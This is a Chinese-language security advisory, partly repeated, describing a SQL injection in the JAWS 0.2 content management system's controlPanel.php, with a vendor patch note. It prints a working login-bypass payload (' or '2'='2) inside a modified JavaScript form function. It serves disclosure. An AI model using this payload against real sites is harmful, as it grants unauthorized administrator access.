JAWS ControlPanel.phpSQL注入漏洞
添加时间:
2005-08-17
系统编号:
WAVDB-00497
BUGTRAQ: 10826
影响版本:
JAWS 0.2
程序介绍:
漏洞利用:
解决方案:
厂商补丁:
JAWS
----
目前CVS版本已经修补此问题,请到厂商的主页下载:
http://www.jaws.com.mx/
信息来源:
<*来源:Fernando Quintero (nando@udea.edu.co)
链接:http://marc.theaimsgroup.com/?t=109116358500001&r=1&w=2
*>
2005-08-17
系统编号:
WAVDB-00497
BUGTRAQ: 10826
影响版本:
JAWS 0.2
程序介绍:
Jaws是一款动态构建WEB站点的内容管理系统。
漏洞分析:
Jaws controlpanel.php脚本不正确处理用户提交的URI参数,远程攻击者可以利用这个漏洞无需要提供密码访问管理员控制面版。
由于controlpanel.php脚本对用户提交给 crypted_password 变量缺少正确的逻辑检查,攻击者提交类似''' or '2'='2''的数据,可导致逻辑错误,无需提供正确密码通过验证访问应用程序管理面版。
漏洞利用:
- <script type= text/javascript >
- function crypt_form(form) {
- var new_password = calcMD5(form.password.value);
- form.crypted_password.value = ' or '2'='2 ;
- form.password.value = ;
- return true;
- }
- </script>
解决方案:
厂商补丁:
JAWS
----
目前CVS版本已经修补此问题,请到厂商的主页下载:
http://www.jaws.com.mx/
信息来源:
<*来源:Fernando Quintero (nando@udea.edu.co)
链接:http://marc.theaimsgroup.com/?t=109116358500001&r=1&w=2
*>